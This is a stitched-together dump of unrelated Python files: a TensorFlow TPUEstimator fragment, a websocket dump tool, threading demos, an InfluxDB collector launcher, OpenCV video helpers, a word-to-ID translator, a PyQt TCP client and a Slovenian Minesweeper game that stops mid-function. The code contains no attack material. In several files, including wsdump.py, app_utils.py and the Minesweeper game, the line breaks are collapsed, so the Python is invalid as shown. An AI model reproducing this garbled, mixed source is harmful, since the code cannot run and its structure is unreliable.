= tensor.shape size = np.product(shape) * tensor.dtype.size tensor_structure[key] = shape total_size += size if total_size >= _ONE_GIGABYTE: raise ValueError( '{} The transfer size is larger than the protobuf limit. Please ' 'consider to use Tensors with smaller shapes or reduce batch ' 'size. Given:\n' '{}'.format(message, '\n'.join([ ' -- Key: {}, Shape: {}'.format(k, v) for k, v in tensor_structure.items()]))) def _add_item_to_params(params, key, value): """Adds a new item into `params`.""" if isinstance(params, hparam.HParams): # For HParams, we need to use special API. if key in params: params.set_hparam(key, value) else: params.add_hparam(key, value) else: # Now params is Python dict. params[key] = value
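# Minimal smoke-test sketch for the TPUEstimator defined above. Assumptions:
# a TF 1.x installation with `tf.contrib` available, and `use_tpu=False` so
# everything runs on CPU (the class docstring explicitly allows this). The toy
# input_fn/model_fn below are illustrative placeholders, not part of the module.
if __name__ == '__main__':
  import tensorflow as tf

  def toy_input_fn(params):
    batch_size = params['batch_size']  # injected by TPUEstimator
    data = tf.random_uniform([1000, 10])
    labels = tf.random_uniform([1000], maxval=2, dtype=tf.int32)
    return tf.data.Dataset.from_tensor_slices(
        (data, labels)).repeat().batch(batch_size)

  def toy_model_fn(features, labels, mode, params):
    logits = tf.layers.dense(features, 2)
    loss = tf.losses.sparse_softmax_cross_entropy(labels=labels, logits=logits)
    train_op = tf.train.GradientDescentOptimizer(0.01).minimize(
        loss, global_step=tf.train.get_global_step())
    return tf.estimator.EstimatorSpec(mode, loss=loss, train_op=train_op)

  run_config = tf.contrib.tpu.RunConfig(
      model_dir='/tmp/tpu_estimator_demo',  # placeholder directory
      tpu_config=tf.contrib.tpu.TPUConfig(iterations_per_loop=100))
  estimator = tf.contrib.tpu.TPUEstimator(
      model_fn=toy_model_fn, config=run_config, use_tpu=False,
      train_batch_size=64)
  estimator.train(input_fn=toy_input_fn, max_steps=100)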
wsdump.py
#!d:\github\reddit-stonk-scrape\rsc\scripts\python.exe import argparse import code import sys import threading import time import ssl import gzip import zlib import six from six.moves.urllib.parse import urlparse import websocket try: import readline except ImportError: pass def get_encoding(): encoding = getattr(sys.stdin, "encoding", "") if not encoding: return "utf-8" else: return encoding.lower() OPCODE_DATA = (websocket.ABNF.OPCODE_TEXT, websocket.ABNF.OPCODE_BINARY) ENCODING = get_encoding() class VAction(argparse.Action): def __call__(self, parser, args, values, option_string=None): if values is None: values = "1" try: values = int(values) except ValueError: values = values.count("v") + 1 setattr(args, self.dest, values) def parse_args(): parser = argparse.ArgumentParser(description="WebSocket Simple Dump Tool") parser.add_argument("url", metavar="ws_url", help="websocket url. ex. ws://echo.websocket.org/") parser.add_argument("-p", "--proxy", help="proxy url. ex. http://127.0.0.1:8080") parser.add_argument("-v", "--verbose", default=0, nargs='?', action=VAction, dest="verbose", help="set verbose mode. If set to 1, show opcode. " "If set to 2, enable to trace websocket module") parser.add_argument("-n", "--nocert", action='store_true', help="Ignore invalid SSL cert") parser.add_argument("-r", "--raw", action="store_true", help="raw output") parser.add_argument("-s", "--subprotocols", nargs='*', help="Set subprotocols") parser.add_argument("-o", "--origin", help="Set origin") parser.add_argument("--eof-wait", default=0, type=int, help="wait time(second) after 'EOF' received.") parser.add_argument("-t", "--text", help="Send initial text") parser.add_argument("--timings", action="store_true", help="Print timings in seconds") parser.add_argument("--headers", help="Set custom headers. 
Use ',' as separator") return parser.parse_args() class RawInput: def raw_input(self, prompt): if six.PY3: line = input(prompt) else: line = raw_input(prompt) if ENCODING and ENCODING != "utf-8" and not isinstance(line, six.text_type): line = line.decode(ENCODING).encode("utf-8") elif isinstance(line, six.text_type): line = line.encode("utf-8") return line class InteractiveConsole(RawInput, code.InteractiveConsole): def write(self, data): sys.stdout.write("\033[2K\033[E") # sys.stdout.write("\n") sys.stdout.write("\033[34m< " + data + "\033[39m") sys.stdout.write("\n> ") sys.stdout.flush() def read(self): return self.raw_input("> ") class NonInteractive(RawInput): def write(self, data): sys.stdout.write(data) sys.stdout.write("\n") sys.stdout.flush() def read(self): return self.raw_input("") def main(): start_time = time.time() args = parse_args() if args.verbose > 1: websocket.enableTrace(True) options = {} if args.proxy: p = urlparse(args.proxy) options["http_proxy_host"] = p.hostname options["http_proxy_port"] = p.port if args.origin: options["origin"] = args.origin if args.subprotocols: options["subprotocols"] = args.subprotocols opts = {} if args.nocert: opts = {"cert_reqs": ssl.CERT_NONE, "check_hostname": False} if args.headers: options['header'] = list(map(str.strip, args.headers.split(','))) ws = websocket.create_connection(args.url, sslopt=opts, **options) if args.raw: console = NonInteractive() else: console = InteractiveConsole() print("Press Ctrl+C to quit") def recv(): try: frame = ws.recv_frame() except websocket.WebSocketException: return websocket.ABNF.OPCODE_CLOSE, None if not frame: raise websocket.WebSocketException("Not a valid frame %s" % frame) elif frame.opcode in OPCODE_DATA: return frame.opcode, frame.data elif frame.opcode == websocket.ABNF.OPCODE_CLOSE: ws.send_close() return frame.opcode, None elif frame.opcode == websocket.ABNF.OPCODE_PING: ws.pong(frame.data) return frame.opcode, frame.data return frame.opcode, frame.data def recv_ws(): while True: opcode, data = recv() msg = None if six.PY3 and opcode == websocket.ABNF.OPCODE_TEXT and isinstance(data, bytes): data = str(data, "utf-8") if isinstance(data, bytes) and len(data)>2 and data[:2] == b'\037\213': # gzip magick try: data = "[gzip] " + str(gzip.decompress(data), "utf-8") except: pass elif isinstance(data, bytes): try: data = "[zlib] " + str(zlib.decompress(data, -zlib.MAX_WBITS), "utf-8") except: pass if isinstance(data, bytes): data = repr(data) if args.verbose: msg = "%s: %s" % (websocket.ABNF.OPCODE_MAP.get(opcode), data) else: msg = data if msg is not None: if args.timings: console.write(str(time.time() - start_time) + ": " + msg) else: console.write(msg) if opcode == websocket.ABNF.OPCODE_CLOSE: break thread = threading.Thread(target=recv_ws) thread.daemon = True thread.start() if args.text: ws.send(args.text) while True: try: message = console.read() ws.send(message) except KeyboardInterrupt: return except EOFError: time.sleep(args.eof_wait) return if __name__ == "__main__": try: main() except Exception as e: print(e)
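# Example invocations of the dump tool above, based on its own argument parser
# (the echo URL comes from the script's help text; the proxy and header values
# are placeholders):
#
#   python wsdump.py ws://echo.websocket.org/ -t "hello world"
#   python wsdump.py wss://example.com/socket -v --timings
#   python wsdump.py ws://echo.websocket.org/ -p http://127.0.0.1:8080 --headers "X-Token: abc"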
testcode.py
import logging
import threading
import time


def worker(info, i):
    # Poll the shared stop flag so the main thread can shut the worker down.
    while not info['stop']:
        logging.debug('Hi from myfunc {0}'.format(i))
        time.sleep(0.5)


def main():
    logging.basicConfig(level=logging.DEBUG,
                        format='%(relativeCreated)6d %(threadName)s %(message)s')
    info = {'stop': False}
    threads = []
    for i in range(2):
        thread = threading.Thread(target=worker, args=(info, i))
        thread.start()
        threads.append(thread)
    while True:
        try:
            logging.debug('Hello from main')
            time.sleep(0.75)
        except KeyboardInterrupt:
            info['stop'] = True
            break
    # Join every worker, not just the last one that was started.
    for thread in threads:
        thread.join()


if __name__ == '__main__':
    main()
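# A common alternative to the shared-dict flag above is threading.Event, which
# gives the same cooperative shutdown without mutating a dictionary. Minimal
# sketch of that variant (worker_event is a drop-in replacement for worker;
# the commented lines show the corresponding changes in main()):
def worker_event(stop_event, i):
    # Run until the main thread sets the event.
    while not stop_event.is_set():
        logging.debug('Hi from myfunc {0}'.format(i))
        time.sleep(0.5)

# In main():
#     stop_event = threading.Event()
#     threads = [threading.Thread(target=worker_event, args=(stop_event, i))
#                for i in range(2)]
#     ...
#     stop_event.set()   # on KeyboardInterrupt; workers exit on their next check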
main.py
import asyncio
import logging
import os
import threading
from time import sleep
from unittest.mock import MagicMock

from dotenv import load_dotenv

from Collectors.EdgeOS.Collector import EdgeOSCollector
from Collectors.Environment.Collector import EnvironmentCollector
from DB.InfluxDBCloud import InfluxDBCloud

_loop = None


def schedule_background(coro):
    """Schedule a coroutine on a shared event loop running in a daemon thread.

    The loop is created lazily on first use; call_soon_threadsafe hands the
    coroutine over to the loop's thread, where it is wrapped in a Task.
    """
    global _loop
    if _loop is None:
        _loop = asyncio.new_event_loop()
        threading.Thread(target=_loop.run_forever, daemon=True).start()
    _loop.call_soon_threadsafe(asyncio.create_task, coro)


if __name__ == '__main__':
    load_dotenv("../settings.env")
    influx_url = os.environ.get('INFLUX_URL')
    influx_token = os.environ.get('INFLUX_TOKEN')
    influx_org = os.environ.get('INFLUX_ORG')
    influx_bucket = os.environ.get('INFLUX_BUCKET')

    logging.basicConfig(format='%(asctime)s:%(levelname)s:%(name)s:%(message)s')
    logger = logging.getLogger()
    if os.environ.get("DEBUG_MODE"):
        logger.setLevel(logging.DEBUG)
    else:
        logger.setLevel(logging.INFO)

    with InfluxDBCloud(influx_url, influx_bucket, influx_token, influx_org) as db_writer:
        if os.environ.get("NO_DB_WRITE"):
            # Swap the real write method for a mock so nothing reaches the database.
            db_writer.write = MagicMock(side_effect=lambda x: logging.info("Suppressed DB Write"))
        eosc = EdgeOSCollector(db_writer)
        eosc.register_collector()
        envc = EnvironmentCollector(db_writer)
        envc.register_collector()

        schedule_background(eosc.start())
        schedule_background(envc.start())

        # Keep the main thread alive; the collectors run on the background loop.
        while True:
            sleep(1)
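# schedule_background() runs every coroutine on a single event loop that lives
# in a daemon thread, so the blocking main thread (the sleep loop above) stays
# free. A sketch of the same pattern with a dummy coroutine (`tick` is a
# placeholder; the real collectors' start() coroutines are project-specific):
#
#   async def tick(name, interval):
#       while True:
#           logging.info('%s tick', name)
#           await asyncio.sleep(interval)
#
#   schedule_background(tick('demo-a', 1.0))
#   schedule_background(tick('demo-b', 2.5))
#   # main thread remains free to block, e.g. sleep(10)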
app_utils.py
# From http://www.pyimagesearch.com/2015/12/21/increasing-webcam-fps-with-python-and-opencv/ import struct import six import collections import cv2 import datetime import subprocess as sp import json import numpy import time from threading import Thread from matplotlib import colors class FPS: def __init__(self): # store the start time, end time, and total number of frames # that were examined between the start and end intervals self._start = None self._end = None self._numFrames = 0 def start(self): # start the timer self._start = datetime.datetime.now() return self def stop(self): # stop the timer self._end = datetime.datetime.now() def update(self): # increment the total number of frames examined during the # start and end intervals self._numFrames += 1 def elapsed(self): # return the total number of seconds between the start and # end interval return (self._end - self._start).total_seconds() def fps(self): # compute the (approximate) frames per second return self._numFrames / self.elapsed() class HLSVideoStream: def __init__(self, src): # initialize the video camera stream and read the first frame # from the stream # initialize the variable used to indicate if the thread should # be stopped self.stopped = False FFMPEG_BIN = "ffmpeg" metadata = {} while "streams" not in metadata.keys(): print('ERROR: Could not access stream. Trying again.') info = sp.Popen(["ffprobe", "-v", "quiet", "-print_format", "json", "-show_format", "-show_streams", src], stdin=sp.PIPE, stdout=sp.PIPE, stderr=sp.PIPE) out, err = info.communicate(b"ffprobe -v quiet -print_format json -show_format -show_streams http://52.91.28.88:8080/hls/live.m3u8") metadata = json.loads(out.decode('utf-8')) time.sleep(5) print('SUCCESS: Retrieved stream metadata.') self.WIDTH = metadata["streams"][0]["width"] self.HEIGHT = metadata["streams"][0]["height"] self.pipe = sp.Popen([ FFMPEG_BIN, "-i", src, "-loglevel", "quiet", # no text output "-an", # disable audio "-f", "image2pipe", "-pix_fmt", "bgr24", "-vcodec", "rawvideo", "-"], stdin = sp.PIPE, stdout = sp.PIPE) print('WIDTH: ', self.WIDTH) raw_image = self.pipe.stdout.read(self.WIDTH*self.HEIGHT*3) # read 432*240*3 bytes (= 1 frame) self.frame = numpy.fromstring(raw_image, dtype='uint8').reshape((self.HEIGHT,self.WIDTH,3)) self.grabbed = self.frame is not None def start(self): # start the thread to read frames from the video stream Thread(target=self.update, args=()).start() return self def update(self): # keep looping infinitely until the thread is stopped # if the thread indicator variable is set, stop the thread while True: if self.stopped: return raw_image = self.pipe.stdout.read(self.WIDTH*self.HEIGHT*3) # read 432*240*3 bytes (= 1 frame) self.frame = numpy.fromstring(raw_image, dtype='uint8').reshape((self.HEIGHT,self.WIDTH,3)) self.grabbed = self.frame is not None def read(self): # return the frame most recently read return self.frame def stop(self): # indicate that the thread should be stopped self.stopped = True class WebcamVideoStream: def __init__(self, src, width, height): # initialize the video camera stream and read the first frame # from the stream self.stream = cv2.VideoCapture(src) self.stream.set(cv2.CAP_PROP_FRAME_WIDTH, width) self.stream.set(cv2.CAP_PROP_FRAME_HEIGHT, height) (self.grabbed, self.frame) = self.stream.read() # initialize the variable used to indicate if the thread should # be stopped self.stopped = False def start(self): # start the thread to read frames from the video stream Thread(target=self.update, args=()).start() return self def 
update(self): # keep looping infinitely until the thread is stopped while True: # if the thread indicator variable is set, stop the thread if self.stopped: return # otherwise, read the next frame from the stream (self.grabbed, self.frame) = self.stream.read() def read(self): # return the frame most recently read return self.frame def stop(self): # indicate that the thread should be stopped self.stopped = True def standard_colors(): colors = [ 'AliceBlue', 'Chartreuse', 'Aqua', 'Aquamarine', 'Azure', 'Beige', 'Bisque', 'BlanchedAlmond', 'BlueViolet', 'BurlyWood', 'CadetBlue', 'AntiqueWhite', 'Chocolate', 'Coral', 'CornflowerBlue', 'Cornsilk', 'Crimson', 'Cyan', 'DarkCyan', 'DarkGoldenRod', 'DarkGrey', 'DarkKhaki', 'DarkOrange', 'DarkOrchid', 'DarkSalmon', 'DarkSeaGreen', 'DarkTurquoise', 'DarkViolet', 'DeepPink', 'DeepSkyBlue', 'DodgerBlue', 'FireBrick', 'FloralWhite', 'ForestGreen', 'Fuchsia', 'Gainsboro', 'GhostWhite', 'Gold', 'GoldenRod', 'Salmon', 'Tan', 'HoneyDew', 'HotPink', 'IndianRed', 'Ivory', 'Khaki', 'Lavender', 'LavenderBlush', 'LawnGreen', 'LemonChiffon', 'LightBlue', 'LightCoral', 'LightCyan', 'LightGoldenRodYellow', 'LightGray', 'LightGrey', 'LightGreen', 'LightPink', 'LightSalmon', 'LightSeaGreen', 'LightSkyBlue', 'LightSlateGray', 'LightSlateGrey', 'LightSteelBlue', 'LightYellow', 'Lime', 'LimeGreen', 'Linen', 'Magenta', 'MediumAquaMarine', 'MediumOrchid', 'MediumPurple', 'MediumSeaGreen', 'MediumSlateBlue', 'MediumSpringGreen', 'MediumTurquoise', 'MediumVioletRed', 'MintCream', 'MistyRose', 'Moccasin', 'NavajoWhite', 'OldLace', 'Olive', 'OliveDrab', 'Orange', 'OrangeRed', 'Orchid', 'PaleGoldenRod', 'PaleGreen', 'PaleTurquoise', 'PaleVioletRed', 'PapayaWhip', 'PeachPuff', 'Peru', 'Pink', 'Plum', 'PowderBlue', 'Purple', 'Red', 'RosyBrown', 'RoyalBlue', 'SaddleBrown', 'Green', 'SandyBrown', 'SeaGreen', 'SeaShell', 'Sienna', 'Silver', 'SkyBlue', 'SlateBlue', 'SlateGray', 'SlateGrey', 'Snow', 'SpringGreen', 'SteelBlue', 'GreenYellow', 'Teal', 'Thistle', 'Tomato', 'Turquoise', 'Violet', 'Wheat', 'White', 'WhiteSmoke', 'Yellow', 'YellowGreen' ] return colors def color_name_to_rgb(): colors_rgb = [] for key, value in colors.cnames.items(): colors_rgb.append((key, struct.unpack('BBB', bytes.fromhex(value.replace('#', ''))))) return dict(colors_rgb) def draw_boxes_and_labels( boxes, classes, scores, category_index, instance_masks=None, keypoints=None, max_boxes_to_draw=20, min_score_thresh=.5, agnostic_mode=False): """Returns boxes coordinates, class names and colors Args: boxes: a numpy array of shape [N, 4] classes: a numpy array of shape [N] scores: a numpy array of shape [N] or None. If scores=None, then this function assumes that the boxes to be plotted are groundtruth boxes and plot all boxes as black with no classes or scores. category_index: a dict containing category dictionaries (each holding category index `id` and category name `name`) keyed by category indices. instance_masks: a numpy array of shape [N, image_height, image_width], can be None keypoints: a numpy array of shape [N, num_keypoints, 2], can be None max_boxes_to_draw: maximum number of boxes to visualize. If None, draw all boxes. min_score_thresh: minimum score threshold for a box to be visualized agnostic_mode: boolean (default: False) controlling whether to evaluate in class-agnostic mode or not. This mode will display scores but ignore classes. """ # Create a display string (and color) for every box location, group any boxes # that correspond to the same location. 
    box_to_display_str_map = collections.defaultdict(list)
    box_to_color_map = collections.defaultdict(str)
    box_to_instance_masks_map = {}
    box_to_keypoints_map = collections.defaultdict(list)
    if not max_boxes_to_draw:
        max_boxes_to_draw = boxes.shape[0]
    for i in range(min(max_boxes_to_draw, boxes.shape[0])):
        if scores is None or scores[i] > min_score_thresh:
            box = tuple(boxes[i].tolist())
            if instance_masks is not None:
                box_to_instance_masks_map[box] = instance_masks[i]
            if keypoints is not None:
                box_to_keypoints_map[box].extend(keypoints[i])
            if scores is None:
                box_to_color_map[box] = 'black'
            else:
                if not agnostic_mode:
                    if classes[i] in category_index.keys():
                        class_name = category_index[classes[i]]['name']
                    else:
                        class_name = 'N/A'
                    display_str = '{}: {}%'.format(class_name, int(100 * scores[i]))
                else:
                    display_str = 'score: {}%'.format(int(100 * scores[i]))
                box_to_display_str_map[box].append(display_str)
                if agnostic_mode:
                    box_to_color_map[box] = 'DarkOrange'
                else:
                    box_to_color_map[box] = standard_colors()[classes[i] % len(standard_colors())]

    # Store all the coordinates of the boxes, class names and colors
    color_rgb = color_name_to_rgb()
    rect_points = []
    class_names = []
    class_colors = []
    for box, color in six.iteritems(box_to_color_map):
        ymin, xmin, ymax, xmax = box
        rect_points.append(dict(ymin=ymin, xmin=xmin, ymax=ymax, xmax=xmax))
        class_names.append(box_to_display_str_map[box])
        class_colors.append(color_rgb[color.lower()])
    return rect_points, class_names, class_colors
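A minimal usage sketch for the threaded-capture helpers above (an illustrative addition, not part of the original file; the camera index, frame size, and frame count are assumptions): it pulls frames from a WebcamVideoStream running in a background thread while the FPS helper measures throughput.

if __name__ == '__main__':
    vs = WebcamVideoStream(src=0, width=640, height=480).start()   # background thread keeps grabbing frames
    fps = FPS().start()
    for _ in range(100):
        frame = vs.read()            # most recently grabbed frame, no blocking on camera I/O
        cv2.imshow('Frame', frame)
        cv2.waitKey(1)
        fps.update()
    fps.stop()
    vs.stop()
    cv2.destroyAllWindows()
    print('approx. FPS: {:.2f}'.format(fps.fps()))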
words2ids.py
from utils.vector_manager import VectorManager
from time import time
import multiprocessing as mp
import argparse
import numpy as np
import os
import sys


def word2Id(filename, w2id, debug=False):
    if debug:
        print("Translating %s" % filename)
    unk_id = 0
    file_out = "%s_num" % filename.split("_clean")[0]

    def transform_numpy():
        """
        Transforms a 4D list of words into a 4D numpy array of integers and writes it into file_out
        """
        docs = VectorManager.parse_into_4D(VectorManager.read_vector(filename))
        file_list = []
        for doc in docs:
            doc_list = []
            for paragraph in doc:
                par_list = []
                for sentence in paragraph:
                    s_id = [toId(word) for word in sentence if word]
                    if s_id:
                        par_list.append(s_id)
                doc_list.append(par_list)
            file_list.append(doc_list)
        np.save(file_out, np.array(file_list))

    def transform():
        """
        Transforms a file of words into a space-separated string of word IDs and writes it into <filename>_num_eos
        """
        with open(filename, "rb") as f:  # read bytes and decode explicitly so this works on Python 2 and 3
            data = f.read().decode("latin-1").split()
            ids = " ".join([str(w2id[w]) for w in data])
            with open("%s_num_eos" % filename, "wb") as f:
                f.write(ids.encode("latin-1"))

    def toId(word):
        """
        Return ID of the word (or 0 if word is not in word2Id dict)
        :param word: word to translate
        :return: Id of the word
        """
        word_id = unk_id
        try:
            word_id = w2id[word]
        except KeyError:
            pass
        finally:
            return word_id

    transform()  # return transform()


class FileW2ID(object):
    """
    Auxiliary class which holds the filepaths and w2id structure and yields them one at a time in order to avoid
    replicating the w2id structure (which can be quite big)
    """

    def __init__(self, filepaths, w2id):
        self.filepaths = filepaths
        self.w2id = w2id

    def __iter__(self):
        for file in self.filepaths:
            yield (file, self.w2id)


def translate_files(data_path, w2id, suffix="_clean", debug=False):
    """
    Handles the parallel translation from word to id of the files in data_path with the mapping w2id
    :param data_path: path of the files to transform. Used to be called from either main or as block of the pipeline
    :param w2id: mappings to be used
    """
    print("[BLOCK] Translating files from %s" % (data_path))
    filepaths = []
    for root, dirs, files in os.walk(data_path):
        filepaths.extend(["%s/%s" % (root, file) for file in files if file.endswith(suffix)])

    threads = min(mp.cpu_count() * 4, len(filepaths))  # cap the number of worker processes at the number of files
    print("[BLOCK] Starting %s processes to translate to IDs %s files" % (threads, len(filepaths)))
    i = 0
    while i < len(filepaths):
        ps = []
        j = 0
        while j < threads and (i + j) < len(filepaths):
            if debug:
                print("[%s] Creating %s of %s for file %s" % (i, i + j, len(filepaths), filepaths[i + j]))
            p = (mp.Process(target=word2Id, args=(filepaths[i + j], w2id,)))
            p.start()
            ps.append(p)
            j += 1
        if debug:
            print("%s process in the list to join" % len(ps))
        j = 0
        while j < threads and (i + j) < len(filepaths):
            if debug:
                print("[%s] Joining %s of %s for file %s" % (i, j, len(filepaths), filepaths[i + j]))
            ps[j].join()
            j += 1
        i += j

    # for p in iter_file_w2id:
    #     word2Id(p)
    # p = mp.Pool(threads, maxtasksperchild=1)
    # p.map(word2Id, iter_file_w2id)

    print("[BLOCK] Files translated to IDs")
    sys.stdout.flush()


if __name__ == '__main__':
    parser = argparse.ArgumentParser()
    parser.add_argument('-d', '--data', type=str, help="Path of the data to be translated with word2id vector."
                                                       " and clean up.", required=True)
    parser.add_argument('-w', '--word_vector', type=str, help="Word2ID vector to be used for doc translation.",
                        required=False, default="../models/eos/word2id_1000.pklz")

    args = parser.parse_args()
    data_path = args.data
    word2id_file = args.word_vector

    begin = time()

    w2Id = VectorManager.read_vector(word2id_file)
    translate_files(data_path, w2Id)

    end = time()
    print("Total processing time: %d seconds" % (end - begin))
testTcpLogic.py
from PyQt5 import QtWidgets
import testTcpUi
import socket
import threading
import json
import sys
# import stopThreading


class TcpLogic(testTcpUi.ToolsUi):
    def __init__(self, num):
        super(TcpLogic, self).__init__(num)
        self.tcp_socket = None
        self.sever_th = None
        self.client_th = None
        self.client_socket_list = list()
        self.link = False  # marks whether a connection is currently open

    def tcp_client_start(self):
        """
        Helper method: connect this TCP client to a server.
        :return:
        """
        self.tcp_socket = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
        address = ('127.0.0.1', 9999)
        try:
            self.tcp_socket.connect(address)
        except Exception:
            self.signal_connect_error.emit()
            return -1
        else:
            self.client_th = threading.Thread(
                target=self.tcp_client_concurrency, args=(address,))
            self.client_th.start()

    def tcp_client_concurrency(self, address):
        while True:
            recv_msg = self.tcp_socket.recv(1024)
            if recv_msg:
                msg = json.loads(recv_msg.decode('utf-8'))
                if msg[0] == 'question':
                    print('msg==question')
                    self.signal_write_question.emit(msg)
                elif msg[0] == 'pass' or msg[0] == 'fail':
                    print('msg==pass or fail')
                    self.signal_question_end.emit(msg)
                elif msg[0] == 'profession error':
                    print('msg==profession error')
                    self.signal_profession_error.emit()
                elif msg[0] == 'profession ok':
                    print('msg==profession ok')
                    self.signal_ui_change.emit()
                elif msg[0] == 'confirm':
                    print('msg==confirm')
                    self.signal_write_msg.emit(str(msg[1]))
            else:
                self.tcp_socket.close()
                break

    def tcp_send(self, msg):
        print(msg)
        self.tcp_socket.send(msg.encode('utf-8'))


if __name__ == '__main__':
    app = QtWidgets.QApplication(sys.argv)
    ui = TcpLogic(1)
    ui.show()
    sys.exit(app.exec_())
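A hypothetical stand-alone test server (not part of the original program; host, port, and message text are assumptions) that speaks the JSON-over-TCP format tcp_client_concurrency() above dispatches on, so the client can be exercised without the real backend.

import json
import socket

def run_test_server(host='127.0.0.1', port=9999):
    srv = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
    srv.setsockopt(socket.SOL_SOCKET, socket.SO_REUSEADDR, 1)
    srv.bind((host, port))
    srv.listen(1)
    conn, addr = srv.accept()                       # wait for TcpLogic.tcp_client_start() to connect
    print('client connected from %s:%s' % addr)
    conn.send(json.dumps(['question', 'example question text']).encode('utf-8'))
    reply = conn.recv(1024)                         # whatever the client pushes back via tcp_send()
    print('client replied:', reply.decode('utf-8'))
    conn.close()
    srv.close()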
minolovec.py
from tkinter import * from tkinter import messagebox from PIL import Image, ImageTk from polje import * import racunalnik import random import threading # array barv za stevilke na polju BARVE = {1: '#8B00FF', 2: '#4B0082', 3: '#0000FF', 4: '#20A106', 5: '#F2CB1D', 6: '#FF7F00', 7: '#FF0000', 8: '#000000', 9: '#000000'} class Minesweeper(): def __init__(self, master, velikost, mine): self.velikost = velikost # velikost kvadratnega igralnega polja self.kvadratek = 30 # velikost enega kvadratka na igralnem polju self.mine = mine # stevilo min self.polje = [[Polje(j, i) for i in range(self.velikost)] for j in range(self.velikost)] self.preostale_mine = IntVar(value=self.mine) self.zmage = IntVar(0) self.porazi = IntVar(0) self.gameactive = True # ali igra poteka self.odprta_polja = [] # vsa trenutno odprta polja self.zaprta_polja = [(i, j) for i in range(self.velikost) for j in range(self.velikost)] # vsa trenutno zaprta # polja self.zastave = [] # vsa polja, ki so trenutno oznacena z zastavico # --- INTELIGENCA --- self.vlakno = None self.inteligenca = None self.p = None # poteza self.pomoc = True # ali igralec zeli pomoc racunalnika ali ne self.zakasnitev = 30 # zakasnitev risanja potez racunalnika # --- GUI --- self.master = master # da ga lahko kasneje unicimo self.ozadje = '#BABABA' # barva ozadja polj zastava = Image.open('flag_small.png') self.zastava = ImageTk.PhotoImage(zastava) # nalozimo sliko zastave bomba = Image.open('bomb_small.png') self.bomba = ImageTk.PhotoImage(bomba) # nalozimo sliko mine self.nastavitve = None # okno z nastavitvami self.maxvelikost = 30 # maksimalna velikost, ki jo bo uporabnik lahko izbral pri nastavitvah self.izbrana_velikost = None # velikost, ki jo je uporabnik izbral self.izbrane_mine = None # stevilo min, ki jih bo uporabnik izbral self.izbran_igralec = None # ali bo uporabnik izbral resevanje s pomocjo racunalnika master.title('Minolovec') okvir = Frame(master) okvir.grid() menu = Menu(master) master.config(menu=menu) podmenu = Menu(menu) podmenu.add_command(label='Nova igra [F1]', command=self.nova_igra) podmenu.add_command(label='Nastavitve [F2]', command=self.okno_z_nastavitvami) podmenu.add_separator() podmenu.add_command(label='Izhod [Esc]', command=self.izhod) menu.add_cascade(label='File', menu=podmenu) Label(okvir, text='Zmage: ').grid(row=0, column=0) Label(okvir, textvariable=self.zmage).grid(row=0, column=1, sticky='W') Label(okvir, text='Porazi: ').grid(row=1, column=0) Label(okvir, textvariable=self.porazi).grid(row=1, column=1, sticky='W') Label(okvir, text='Preostale mine: ').grid(row=2, column=0, sticky='S') Label(okvir, textvariable=self.preostale_mine).grid(row=2, column=1, sticky='WS') self.poteza_racunalnika = Button(okvir, text='Namig', command=self.prepusti_racunalniku) self.poteza_racunalnika.grid(row=0, column=2, rowspan=3) self.platno = Canvas(okvir, width=self.velikost*self.kvadratek, height=self.velikost*self.kvadratek, background='#FFFFFF', bd=1, highlightthickness=1, highlightbackground='#000000') self.platno.grid(row=3, column=0, columnspan=3) self.narisi_mrezo() self.platno.bind("<Button-1>", self.klik) self.platno.bind("<Button-3>", self.klik) master.bind("<F1>", self.nova_igra) master.bind("<F2>", self.okno_z_nastavitvami) master.bind("<Escape>", self.izhod) self.okno_z_nastavitvami() # *********************** # PRIPRAVA IGRE # *********************** def spremeni_stevilko_polj(self, x, y): """ Spremeni stevilko polj okoli mine, ta je podana s koordinatami x in y. 
""" for z in range(max(0, x-1), min(x+2, self.velikost)): for w in range(max(0, y-1), min(y+2, self.velikost)): if self.polje[z][w].vrednost != 'x': self.polje[z][w].vrednost += 1 def napolni(self): """ Nakljucno napolni igralno polje s 'self.mine' stevilom min. Mine so oznacene z x, prazni kvadratki z 0. """ i = self.mine prazno = [(x, y) for x in range(self.velikost) for y in range(self.velikost)] while i > 0: (x, y) = random.choice(prazno) prazno.remove((x, y)) self.polje[x][y].vrednost = 'x' self.spremeni_stevilko_polj(x, y) i -= 1 def nova_igra(self, *args): """ Resetira vse spremenljivke in pripravi novo igro. """ if self.vlakno is not None: self.vlakno.join() self.polje = [[Polje(j, i) for i in range(self.velikost)] for j in range(self.velikost)] self.napolni() self.preostale_mine.set(self.mine) self.platno.delete(ALL) self.platno.config(width=self.velikost*self.kvadratek, height=self.velikost*self.kvadratek) self.narisi_mrezo() self.gameactive = True self.zaprta_polja = [(i, j) for i in range(self.velikost) for j in range(self.velikost)] self.odprta_polja = [] self.zastave = [] # self.prikazi_celotno_polje(True) # prikazovanje celotnega polja za debugiranje if self.pomoc: self.platno.after(self.zakasnitev, self.prepusti_racunalniku) # *********************** # NASTAVITEV IGRE # *********************** def ponastavi(self, *args): """ Ponastavi parametre igre glede na podatke, vnešene v okno z nastavitvami. Klice se ob kliku na gumb 'V redu' ali ob pritisku na <Enter> znotraj okna z nastavitvami. """ try: m = int(self.izbrane_mine.get()) v = int(self.izbrana_velikost.get()) if m > v ** 2: messagebox.showerror('Nepravilno število min', 'Vnešeno število min je večje od površine polja!') self.nastavitve.focus() self.izbrana_velikost.focus() elif v > self.maxvelikost: messagebox.showerror('Prevelika velikost polja', 'Prosim, vnesite velikost med 1 in {0}!'.format( self.maxvelikost)) self.nastavitve.focus() self.izbrana_velikost.focus() else: self.velikost = v self.mine = m self.pomoc = True if self.izbran_igralec.get() else False if self.pomoc: self.poteza_racunalnika.grid_remove() else: self.poteza_racunalnika.grid() self.nastavitve.destroy() self.gameactive = True self.nova_igra() except ValueError: messagebox.showerror('Nepravilna vrednost', 'Vnesli ste nepravilno vrednost!') self.nastavitve.focus() self.izbrana_velikost.focus() def posodobi_max_stevilo_min(self): """ Glede na vneseno velikost polja posodobi zgornjo mejo za stevilo min v oknu za nastavitve. """ velikost = int(self.izbrana_velikost.get()) self.izbrane_mine.config(to=velikost**2) def okno_z_nastavitvami(self, *args): """ Odpre okno z nastavitvami. 
